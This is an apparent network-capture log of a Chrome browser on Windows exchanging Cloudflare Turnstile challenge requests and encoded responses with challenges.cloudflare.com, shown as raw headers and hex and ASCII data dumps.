                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.849741104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:02 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe654bc286c7d0b/1736277899837/y5opRdNzxhmLLrW HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:02 UTC200INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:02 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654dccd6d4239-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2b 00 00 00 56 08 02 00 00 00 d9 83 f8 88 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR+VIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.849743104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 32212
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: _dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B.
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:04 UTC16384OUTData Raw: 76 5f 38 66 65 36 35 34 62 63 32 38 36 63 37 64 30 62 3d 47 33 4a 72 5a 42 6b 64 6d 42 6d 66 4a 66 56 6b 55 45 4a 72 56 39 6d 47 4a 42 73 66 41 62 76 72 69 4a 6b 57 6f 62 5a 72 4d 78 62 61 62 68 5a 66 72 62 33 72 62 74 4a 6f 62 4c 72 57 68 73 62 75 55 4a 62 63 33 6b 31 62 56 51 34 78 30 62 45 6d 6b 52 62 4a 4a 62 50 69 42 62 52 70 62 61 52 72 66 32 6b 62 50 77 78 62 46 66 6d 25 32 62 34 57 62 78 4c 6b 32 64 69 24 34 72 6b 75 47 65 6d 6b 61 6f 64 4c 62 33 6d 6d 50 4c 50 74 78 62 50 38 35 62 54 72 66 75 62 42 33 62 45 36 4a 62 52 72 35 6b 4c 61 4f 64 73 39 44 36 24 31 45 77 62 6b 46 42 73 24 45 36 4a 4f 69 61 51 42 78 35 4e 68 33 62 50 36 69 56 65 73 48 42 63 37 6d 4a 42 69 46 42 41 71 44 6e 36 64 24 62 75 41 71 2b 4c 75 38 49 76 70 49 6e 6b 64 69 6b 37 64
                                                            Data Ascii: v_8fe654bc286c7d0b=G3JrZBkdmBmfJfVkUEJrV9mGJBsfAbvriJkWobZrMxbabhZfrb3rbtJobLrWhsbuUJbc3k1bVQ4x0bEmkRbJJbPiBbRpbaRrf2kbPwxbFfm%2b4WbxLk2di$4rkuGemkaodLb3mmPLPtxbP85bTrfubB3bE6JbRr5kLaOds9D6$1EwbkFBs$E6JOiaQBx5Nh3bP6iVesHBc7mJBiFBAqDn6d$buAq+Lu8IvpInkdik7d
                                                            2025-01-07 19:25:04 UTC15828OUTData Raw: 42 4a 50 53 66 4d 4a 6e 35 4c 72 67 53 43 2d 6e 62 6b 7a 4f 70 62 61 62 45 62 56 6d 6b 70 62 68 72 63 6d 66 6d 62 36 62 4d 6d 62 36 62 45 62 6b 7a 66 24 62 48 4c 69 2b 5a 31 72 4f 59 63 4c 62 7a 62 53 62 56 6d 62 61 62 38 74 47 4a 66 32 62 47 72 42 6d 6b 34 62 51 72 45 6d 42 51 62 24 62 66 6d 6b 72 62 53 69 65 70 66 71 62 24 62 4d 70 42 6f 30 4e 62 45 4a 62 77 72 6f 33 62 73 6d 45 33 55 4c 59 6e 66 6b 4a 48 62 47 67 62 33 62 57 62 48 58 6b 72 62 71 62 45 72 6b 43 62 6c 72 4a 4a 66 75 62 6e 4c 50 35 62 63 50 6f 62 48 72 62 52 62 39 78 48 72 66 6d 62 70 75 73 72 66 6a 6c 67 72 47 73 4a 77 72 51 62 50 6d 6b 55 62 73 78 47 34 6b 6b 62 30 62 46 70 62 4f 72 74 33 46 33 42 58 75 6c 72 45 4c 6b 4c 62 67 72 35 78 62 68 6d 71 72 24 78 62 63 62 4f 62 4a 4c 42 68 72
                                                            Data Ascii: BJPSfMJn5LrgSC-nbkzOpbabEbVmkpbhrcmfmb6bMmb6bEbkzf$bHLi+Z1rOYcLbzbSbVmbab8tGJf2bGrBmk4bQrEmBQb$bfmkrbSiepfqb$bMpBo0NbEJbwro3bsmE3ULYnfkJHbGgb3bWbHXkrbqbErkCblrJJfubnLP5bcPobHrbRb9xHrfmbpusrfjlgrGsJwrQbPmkUbsxG4kkb0bFpbOrt3F3BXulrELkLbgr5xbhmqr$xbcbObJLBhr
                                                            2025-01-07 19:25:04 UTC318INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:04 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 26256
                                                            Connection: close
                                                            cf-chl-gen: yJcWBWa++5PCkv6mncwV0mV8iX5ERUMneLhXqiCvQOolmz1cgGsTR8Up8y6wslevyNg=$nj6hsEybSysAtWpL
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654e51e69430a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:04 UTC1051INData Raw: 66 57 4f 49 65 58 52 79 6d 57 70 6d 69 35 6c 73 62 48 47 51 58 49 2b 6a 66 49 64 33 71 57 65 4c 65 36 36 48 70 6f 36 79 6e 61 36 4a 69 34 2b 4c 71 70 4f 74 63 35 70 32 6d 33 32 5a 6e 72 4f 39 72 58 69 44 78 73 43 62 78 38 48 49 72 34 6a 44 78 63 75 73 72 4c 37 44 70 4e 6e 52 75 39 76 4e 31 74 43 56 7a 37 2f 65 31 72 69 35 73 4e 37 41 70 64 50 72 75 37 62 4f 76 65 2f 79 32 36 79 76 37 75 76 78 36 63 79 34 32 2f 53 7a 73 4d 76 4b 79 73 76 6a 41 2f 6e 51 31 51 44 62 39 74 59 46 78 73 51 4e 79 64 41 50 44 63 76 4f 45 68 54 6e 2b 4d 7a 73 44 42 50 76 49 43 41 66 46 69 55 54 46 52 51 52 34 75 4c 79 43 42 6a 72 39 69 30 51 37 50 7a 6c 43 2f 4c 76 36 51 6e 72 4d 44 55 63 39 42 50 31 47 2f 6b 75 44 6a 74 48 47 77 49 55 47 52 6b 5a 2f 69 59 49 42 79 39 4e 43 79 4e
                                                            Data Ascii: fWOIeXRymWpmi5lsbHGQXI+jfId3qWeLe66Hpo6yna6Ji4+LqpOtc5p2m32ZnrO9rXiDxsCbx8HIr4jDxcusrL7DpNnRu9vN1tCVz7/e1ri5sN7ApdPru7bOve/y26yv7uvx6cy42/SzsMvKysvjA/nQ1QDb9tYFxsQNydAPDcvOEhTn+MzsDBPvICAfFiUTFRQR4uLyCBjr9i0Q7PzlC/Lv6QnrMDUc9BP1G/kuDjtHGwIUGRkZ/iYIBy9NCyN
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 6f 70 34 57 50 6d 49 31 72 6b 72 47 6b 67 71 47 47 75 4c 4f 6a 66 4c 79 35 72 62 42 39 77 72 6d 75 68 4c 4f 50 73 49 69 56 6d 35 6a 4e 79 4c 32 71 68 36 4f 39 78 35 50 4d 79 63 57 57 7a 4e 54 61 71 39 4c 52 30 72 6e 61 6f 37 44 4e 70 71 62 44 6f 71 62 71 75 71 72 62 35 64 33 6b 38 4c 75 38 36 38 4c 42 79 4e 62 58 31 63 7a 37 30 62 72 52 33 72 75 36 77 2f 4b 2b 32 39 4c 64 33 77 41 4b 43 4d 6a 4b 37 50 76 38 42 4e 4c 52 43 2f 4d 52 43 67 7a 5a 37 42 58 58 41 42 59 4c 47 66 6b 66 38 66 77 49 2f 68 4d 55 48 69 7a 37 47 52 77 4e 4c 2b 34 50 41 76 58 7a 44 53 6f 35 41 77 34 73 45 68 38 4c 48 54 6f 33 4d 68 59 51 4e 7a 41 6e 50 54 30 44 43 69 41 47 47 45 6b 68 4c 30 6f 31 44 52 45 67 53 45 70 54 4b 78 63 55 47 56 4d 37 48 79 42 68 4c 57 4d 6b 56 56 74 58 57 31
                                                            Data Ascii: op4WPmI1rkrGkgqGGuLOjfLy5rbB9wrmuhLOPsIiVm5jNyL2qh6O9x5PMycWWzNTaq9LR0rnao7DNpqbDoqbquqrb5d3k8Lu868LByNbX1cz70brR3ru6w/K+29Ld3wAKCMjK7Pv8BNLRC/MRCgzZ7BXXABYLGfkf8fwI/hMUHiz7GRwNL+4PAvXzDSo5Aw4sEh8LHTo3MhYQNzAnPT0DCiAGGEkhL0o1DREgSEpTKxcUGVM7HyBhLWMkVVtXW1
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 63 59 36 4e 71 71 2b 45 63 59 39 74 6a 6e 6d 35 75 35 4e 36 6a 61 75 74 72 72 6d 65 68 4c 7a 44 77 4a 2b 6e 69 59 71 6d 71 74 47 71 71 63 53 71 72 4e 69 6f 30 61 79 59 33 72 6d 62 72 64 76 63 6c 62 6a 67 70 4c 44 49 34 4e 7a 6e 70 4d 66 75 34 2b 66 43 32 38 4f 71 7a 65 61 70 37 50 6e 6d 35 2b 66 4b 75 76 66 35 75 50 48 36 75 73 44 33 41 2f 54 32 30 67 54 67 35 2b 58 2b 33 41 76 6e 33 73 73 53 31 68 6e 57 47 67 30 4f 37 52 37 6e 37 76 45 64 48 77 37 61 42 43 67 53 2b 42 49 48 48 65 6f 46 49 4f 6e 71 4c 78 7a 76 41 79 4d 6c 4d 78 59 76 4a 51 6b 77 4f 78 51 39 41 51 77 62 2f 52 70 46 50 51 49 46 43 52 59 37 50 69 46 45 42 6a 4a 42 4e 44 34 53 52 30 59 57 4b 30 55 74 46 78 51 6f 4d 69 39 68 4c 52 31 52 48 57 4d 35 4f 30 4a 71 4f 44 56 5a 4a 57 6c 65 57 56 70
                                                            Data Ascii: cY6Nqq+EcY9tjnm5u5N6jautrrmehLzDwJ+niYqmqtGqqcSqrNio0ayY3rmbrdvclbjgpLDI4NznpMfu4+fC28Oqzeap7Pnm5+fKuvf5uPH6usD3A/T20gTg5+X+3Avn3ssS1hnWGg0O7R7n7vEdHw7aBCgS+BIHHeoFIOnqLxzvAyMlMxYvJQkwOxQ9AQwb/RpFPQIFCRY7PiFEBjJBND4SR0YWK0UtFxQoMi9hLR1RHWM5O0JqODVZJWleWVp
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 6e 69 71 74 4b 75 35 6e 36 36 78 6b 72 61 6a 6b 72 42 2b 73 4c 75 79 72 4b 65 62 6f 35 65 2f 6e 34 72 50 7a 64 43 32 78 72 57 71 70 4c 53 32 70 35 37 66 79 73 2f 4b 76 71 2b 63 32 61 2f 42 36 71 62 45 78 64 62 4b 75 74 37 49 73 72 33 51 72 4f 58 4b 30 37 44 35 32 74 54 77 31 4c 37 4d 41 50 37 50 34 51 54 59 33 63 48 34 78 74 6a 4d 2f 66 6e 6b 42 41 33 68 78 65 66 66 37 77 72 57 2b 65 37 38 38 74 76 6d 44 75 44 71 37 64 30 45 42 41 4d 41 38 79 6b 56 44 41 6a 6e 4b 79 55 44 41 50 7a 76 38 67 73 74 47 51 55 61 38 6a 4d 33 4b 77 63 79 49 67 41 36 50 6a 45 7a 49 42 4d 67 43 42 30 61 4f 79 39 50 4a 30 51 50 53 79 35 46 4d 6a 4a 44 51 78 6c 44 4c 78 30 32 4a 31 52 61 4b 6b 31 51 54 56 42 6f 49 30 64 71 48 55 56 61 59 43 64 71 62 6e 41 73 62 7a 39 78 56 33 42 73
                                                            Data Ascii: niqtKu5n66xkrajkrB+sLuyrKebo5e/n4rPzdC2xrWqpLS2p57fys/Kvq+c2a/B6qbExdbKut7Isr3QrOXK07D52tTw1L7MAP7P4QTY3cH4xtjM/fnkBA3hxeff7wrW+e788tvmDuDq7d0EBAMA8ykVDAjnKyUDAPzv8gstGQUa8jM3KwcyIgA6PjEzIBMgCB0aOy9PJ0QPSy5FMjJDQxlDLx02J1RaKk1QTVBoI0dqHUVaYCdqbnAsbz9xV3Bs
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 75 34 6a 6f 42 38 6b 63 43 6c 69 4d 66 49 68 59 7a 41 71 4a 71 62 73 64 4f 75 30 39 43 31 71 4e 61 75 75 49 33 61 31 36 32 72 33 39 32 77 79 37 32 77 74 62 48 70 32 38 43 6f 33 36 6e 50 6f 65 6a 71 79 65 44 47 77 2f 4f 30 37 4c 54 72 31 4f 54 39 37 76 76 57 37 51 48 59 37 77 43 2f 32 39 71 37 2b 4d 6e 59 36 50 33 73 45 65 7a 4e 33 73 38 51 34 77 34 4e 31 4f 37 71 45 42 58 6d 2b 50 72 38 47 75 37 33 37 69 62 2b 41 69 6e 68 48 50 37 6b 35 76 30 49 4a 43 6b 70 45 44 66 74 36 51 6b 57 4a 53 63 4d 47 42 67 55 45 78 34 6a 50 78 31 47 49 42 45 69 53 51 5a 42 48 78 63 47 54 53 77 65 51 55 51 6c 4d 53 4d 52 4d 7a 51 61 47 44 73 36 58 69 6f 77 50 45 30 67 50 52 30 69 59 6b 55 31 5a 56 35 42 53 54 78 44 53 57 49 76 51 6b 35 42 4c 6e 52 4c 4d 58 45 33 56 6b 6f 32 51
                                                            Data Ascii: u4joB8kcCliMfIhYzAqJqbsdOu09C1qNauuI3a162r392wy72wtbHp28Co36nPoejqyeDGw/O07LTr1OT97vvW7QHY7wC/29q7+MnY6P3sEezN3s8Q4w4N1O7qEBXm+Pr8Gu737ib+AinhHP7k5v0IJCkpEDft6QkWJScMGBgUEx4jPx1GIBEiSQZBHxcGTSweQUQlMSMRMzQaGDs6XiowPE0gPR0iYkU1ZV5BSTxDSWIvQk5BLnRLMXE3Vko2Q
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 38 76 62 32 32 75 4d 53 4b 74 73 58 4d 79 62 43 39 7a 4a 50 4f 79 38 37 42 6f 38 37 58 75 37 66 67 77 62 2f 68 33 4d 33 61 32 70 2f 48 6f 61 72 6b 31 63 79 37 70 39 75 76 7a 36 7a 74 72 73 65 79 2b 50 4c 49 39 50 50 50 36 75 76 68 76 62 54 38 2b 2f 33 32 78 41 44 71 43 77 55 4a 42 76 62 2b 42 39 2f 77 79 77 44 50 41 68 55 56 39 78 72 53 42 64 62 33 49 51 49 4b 34 68 51 52 2b 52 38 6e 49 65 59 46 49 53 49 69 47 78 30 70 37 68 73 71 4d 53 34 56 49 6a 48 33 4d 7a 41 7a 4a 67 67 7a 50 43 45 75 2f 53 34 55 51 77 51 78 41 30 5a 4c 4c 67 64 4b 43 44 49 67 52 31 45 31 53 30 67 71 55 30 4a 58 54 6c 51 61 47 31 56 57 48 31 39 59 58 54 6c 66 57 31 34 38 5a 79 6c 6b 5a 6a 31 65 55 6c 41 7a 62 46 59 76 62 6e 4a 59 4f 46 67 32 61 44 63 78 50 47 70 51 66 6a 78 6d 56 47
                                                            Data Ascii: 8vb22uMSKtsXMybC9zJPOy87Bo87Xu7fgwb/h3M3a2p/Hoark1cy7p9uvz6ztrsey+PLI9PPP6uvhvbT8+/32xADqCwUJBvb+B9/wywDPAhUV9xrSBdb3IQIK4hQR+R8nIeYFISIiGx0p7hsqMS4VIjH3MzAzJggzPCEu/S4UQwQxA0ZLLgdKCDIgR1E1S0gqU0JXTlQaG1VWH19YXTlfW148ZylkZj1eUlAzbFYvbnJYOFg2aDcxPGpQfjxmVG
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 68 73 61 35 6f 4b 75 4c 76 59 36 57 31 4d 47 6e 6b 74 6e 46 71 39 48 59 79 61 2b 65 33 38 33 44 34 65 54 51 33 72 50 6d 31 4d 76 70 37 74 71 2f 73 71 72 65 77 37 62 79 34 4f 32 32 38 75 53 32 75 76 66 70 34 4d 2b 37 37 74 54 66 41 66 48 58 2f 51 58 33 36 77 6f 4c 2b 41 62 4b 44 66 37 7a 46 68 49 42 39 78 49 56 42 2b 7a 33 48 41 6b 57 32 74 73 4f 42 4e 34 66 45 52 34 69 4b 78 66 37 36 69 30 62 45 4f 34 77 48 67 51 71 4d 43 4d 49 4f 6a 6b 6d 48 50 34 2b 4c 43 42 43 51 43 30 6b 50 6b 55 79 4b 41 4e 45 4e 78 78 4b 43 44 6f 78 49 45 73 2f 4e 41 38 50 51 7a 6b 6b 57 45 59 74 4f 46 74 4d 4d 46 5a 64 54 6c 73 77 5a 31 45 6a 59 6d 52 58 54 54 78 6e 57 31 42 71 62 31 30 76 63 6e 52 69 62 6e 4a 37 5a 56 31 49 65 32 6f 38 58 49 4e 77 5a 45 65 43 63 6b 4e 2b 69 58 64
                                                            Data Ascii: hsa5oKuLvY6W1MGnktnFq9HYya+e383D4eTQ3rPm1Mvp7tq/sqrew7by4O228uS2uvfp4M+77tTfAfHX/QX36woL+AbKDf7zFhIB9xIVB+z3HAkW2tsOBN4fER4iKxf76i0bEO4wHgQqMCMIOjkmHP4+LCBCQC0kPkUyKANENxxKCDoxIEs/NA8PQzkkWEYtOFtMMFZdTlswZ1EjYmRXTTxnW1Bqb10vcnRibnJ7ZV1Ie2o8XINwZEeCckN+iXd
                                                            2025-01-07 19:25:04 UTC1369INData Raw: 34 2f 47 7a 37 6e 44 78 64 4c 45 6c 72 6d 2b 32 4e 58 42 73 73 7a 44 35 64 2f 4a 76 74 62 6a 7a 64 66 5a 35 74 69 71 37 65 58 63 33 36 36 79 38 4c 4c 5a 79 75 54 6e 31 2b 77 41 37 4f 33 32 42 4e 4b 34 75 63 44 48 78 76 67 4d 36 2b 63 43 2b 50 76 39 7a 68 58 6a 44 4f 63 46 37 51 34 54 48 66 77 51 36 51 6b 4d 38 39 34 64 33 67 62 79 45 52 51 4d 48 68 55 59 42 4f 6f 77 41 43 67 41 49 51 6f 55 4c 7a 67 5a 4b 2b 30 6c 4a 2f 72 36 4f 66 6f 69 45 69 30 77 2f 6a 70 46 48 55 51 6d 4e 6a 6b 2b 43 30 6b 4c 4d 51 59 39 50 31 41 79 51 6b 56 4b 54 6b 56 48 57 44 70 4b 4e 31 49 66 58 52 39 47 4e 56 46 54 5a 45 5a 57 51 31 35 69 57 56 74 73 54 6c 30 32 5a 6a 4e 78 4d 31 70 49 5a 57 64 34 57 6d 6c 43 63 6e 5a 74 62 34 42 69 63 59 56 36 52 34 56 48 62 6c 74 35 65 34 78 75
                                                            Data Ascii: 4/Gz7nDxdLElrm+2NXBsszD5d/JvtbjzdfZ5tiq7eXc366y8LLZyuTn1+wA7O32BNK4ucDHxvgM6+cC+Pv9zhXjDOcF7Q4THfwQ6QkM894d3gbyERQMHhUYBOowACgAIQoULzgZK+0lJ/r6OfoiEi0w/jpFHUQmNjk+C0kLMQY9P1AyQkVKTkVHWDpKN1IfXR9GNVFTZEZWQ15iWVtsTl02ZjNxM1pIZWd4WmlCcnZtb4BicYV6R4VHblt5e4xu


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.849744104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:04 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:05 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 19:25:05 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cf-chl-out: ZmYHvBgHUI1cSjYWuETnogtTMozSxWYYqlU=$/B0rK0MHDL5swLHS
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654eacb087288-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.849745104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:17 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 34591
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: _dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B.
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:17 UTC16384OUTData Raw: 76 5f 38 66 65 36 35 34 62 63 32 38 36 63 37 64 30 62 3d 47 33 4a 72 5a 42 6b 64 6d 42 6d 66 4a 66 56 6b 55 45 4a 72 56 39 6d 47 4a 42 73 66 41 62 76 72 69 4a 6b 57 6f 62 5a 72 4d 78 62 61 62 68 5a 66 72 62 33 72 62 74 4a 6f 62 4c 72 57 68 73 62 75 55 4a 62 63 33 6b 31 62 56 51 34 78 30 62 45 6d 6b 52 62 4a 4a 62 50 69 42 62 52 70 62 61 52 72 66 32 6b 62 50 77 78 62 46 66 6d 25 32 62 34 57 62 78 4c 6b 32 64 69 24 34 72 6b 75 47 65 6d 6b 61 6f 64 4c 62 33 6d 6d 50 4c 50 74 78 62 50 38 35 62 54 72 66 75 62 42 33 62 45 36 4a 62 52 72 35 6b 4c 61 4f 64 73 39 44 36 24 31 45 77 62 6b 46 42 73 24 45 36 4a 4f 69 61 51 42 78 35 4e 68 33 62 50 36 69 56 65 73 48 42 63 37 6d 4a 42 69 46 42 41 71 44 6e 36 64 24 62 75 41 71 2b 4c 75 38 49 76 70 49 6e 6b 64 69 6b 37 64
                                                            Data Ascii: v_8fe654bc286c7d0b=G3JrZBkdmBmfJfVkUEJrV9mGJBsfAbvriJkWobZrMxbabhZfrb3rbtJobLrWhsbuUJbc3k1bVQ4x0bEmkRbJJbPiBbRpbaRrf2kbPwxbFfm%2b4WbxLk2di$4rkuGemkaodLb3mmPLPtxbP85bTrfubB3bE6JbRr5kLaOds9D6$1EwbkFBs$E6JOiaQBx5Nh3bP6iVesHBc7mJBiFBAqDn6d$buAq+Lu8IvpInkdik7d
                                                            2025-01-07 19:25:17 UTC16384OUTData Raw: 42 4a 50 53 66 4d 4a 6e 35 4c 72 67 53 43 2d 6e 62 6b 7a 4f 70 62 61 62 45 62 56 6d 6b 70 62 68 72 63 6d 66 6d 62 36 62 4d 6d 62 36 62 45 62 6b 7a 66 24 62 48 4c 69 2b 5a 31 72 4f 59 63 4c 62 7a 62 53 62 56 6d 62 61 62 38 74 47 4a 66 32 62 47 72 42 6d 6b 34 62 51 72 45 6d 42 51 62 24 62 66 6d 6b 72 62 53 69 65 70 66 71 62 24 62 4d 70 42 6f 30 4e 62 45 4a 62 77 72 6f 33 62 73 6d 45 33 55 4c 59 6e 66 6b 4a 48 62 47 67 62 33 62 57 62 48 58 6b 72 62 71 62 45 72 6b 43 62 6c 72 4a 4a 66 75 62 6e 4c 50 35 62 63 50 6f 62 48 72 62 52 62 39 78 48 72 66 6d 62 70 75 73 72 66 6a 6c 67 72 47 73 4a 77 72 51 62 50 6d 6b 55 62 73 78 47 34 6b 6b 62 30 62 46 70 62 4f 72 74 33 46 33 42 58 75 6c 72 45 4c 6b 4c 62 67 72 35 78 62 68 6d 71 72 24 78 62 63 62 4f 62 4a 4c 42 68 72
                                                            Data Ascii: BJPSfMJn5LrgSC-nbkzOpbabEbVmkpbhrcmfmb6bMmb6bEbkzf$bHLi+Z1rOYcLbzbSbVmbab8tGJf2bGrBmk4bQrEmBQb$bfmkrbSiepfqb$bMpBo0NbEJbwro3bsmE3ULYnfkJHbGgb3bWbHXkrbqbErkCblrJJfubnLP5bcPobHrbRb9xHrfmbpusrfjlgrGsJwrQbPmkUbsxG4kkb0bFpbOrt3F3BXulrELkLbgr5xbhmqr$xbcbObJLBhr
                                                            2025-01-07 19:25:17 UTC1823OUTData Raw: 54 58 61 7a 48 6e 47 6a 72 71 6d 66 47 47 6c 4a 78 64 4d 33 72 65 72 63 36 42 71 4b 48 41 2b 73 57 42 49 59 35 78 58 5a 53 68 61 6f 64 71 56 35 6d 73 41 53 64 62 35 49 63 71 76 6e 54 35 36 70 78 57 59 4b 54 65 49 6d 42 6b 75 69 77 4f 35 42 67 61 78 37 6e 72 47 57 6b 74 4c 4e 39 2d 47 74 51 62 46 66 31 54 62 61 62 74 54 2d 56 6b 36 62 58 4f 6c 69 49 7a 63 38 6c 49 61 47 7a 62 57 72 69 6b 78 72 39 57 39 37 61 62 69 62 5a 4c 57 52 48 73 62 7a 33 6a 34 50 47 36 5a 74 6c 6b 54 6c 77 4e 62 67 2b 36 4d 72 45 45 49 4a 62 68 65 6e 31 2d 6d 62 65 72 7a 72 66 61 59 57 56 4f 4e 54 78 66 73 6b 54 52 4c 54 38 42 49 78 44 4a 4f 38 65 64 75 35 42 77 65 50 5a 36 4e 5a 56 47 49 62 66 57 53 67 6f 65 36 6f 62 66 4a 6b 48 66 73 34 73 72 6b 64 4f 56 74 67 70 6b 43 49 47 4e 75
